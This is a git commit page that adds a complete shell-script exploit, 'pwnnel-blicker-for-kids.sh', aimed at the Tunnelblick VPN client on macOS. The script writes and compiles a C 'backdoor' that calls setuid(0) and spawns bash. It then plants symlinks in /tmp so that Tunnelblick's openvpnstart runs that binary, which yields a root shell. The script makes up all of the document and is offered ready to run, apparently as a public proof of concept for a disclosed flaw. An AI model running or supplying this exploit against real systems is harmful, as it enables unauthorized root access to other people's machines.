summaryrefslogtreecommitdiffstats
diff options
context:
space:
mode:
authorJason A. Donenfeld <Jason@zx2c4.com>2012-08-11 17:00:56 +0200
committerJason A. Donenfeld <Jason@zx2c4.com>2012-08-11 17:00:56 +0200
commit059cdebb2d51944881dd24e862f9e40b249ee0a6 (patch)
treeaab2dad25534048cf8868377184e5e653fc52db2
parentWhat's the damn program called again? (diff)
downloadPwnnel-Blicker-059cdebb2d51944881dd24e862f9e40b249ee0a6.tar.xz
Pwnnel-Blicker-059cdebb2d51944881dd24e862f9e40b249ee0a6.zip
An easy shell script.
-rwxr-xr-xpwnnel-blicker-for-kids.sh28
1 files changed, 28 insertions, 0 deletions
diff --git a/pwnnel-blicker-for-kids.sh b/pwnnel-blicker-for-kids.sh
new file mode 100755
index 0000000..bc1a336
--- /dev/null
+++ b/pwnnel-blicker-for-kids.sh
@@ -0,0 +1,28 @@
+#!/bin/sh
+echo "[+] Making vulnerable directory."
+mkdir -pv /tmp/pwn/openvpn/openvpn-0
+
+echo "[+] Preparing payload."
+cat > /tmp/pwn/backdoor.c <<_EOF
+#include <unistd.h>
+#include <sys/stat.h>
+#include <stdio.h>
+
+int main()
+{
+ printf("[+] Cleaning up.\n");
+ system("rm -rfv /tmp/pwn");
+ printf("[+] Getting root.\n");
+ setuid(0);
+ setgid(0);
+ execl("/bin/bash", "bash", NULL);
+}
+_EOF
+gcc -o /tmp/pwn/root /tmp/pwn/backdoor.c
+
+echo "[+] Creating symlinks."
+ln -s -v -f /tmp/pwn/root /tmp/pwn/openvpn/openvpn-0/openvpn
+ln -s -v -f /Applications/Tunnelblick.app/Contents/Resources/openvpnstart /tmp/pwn/start
+
+echo "[+] Triggering vulnerable program."
+exec /tmp/pwn/start OpenVPNInfo 0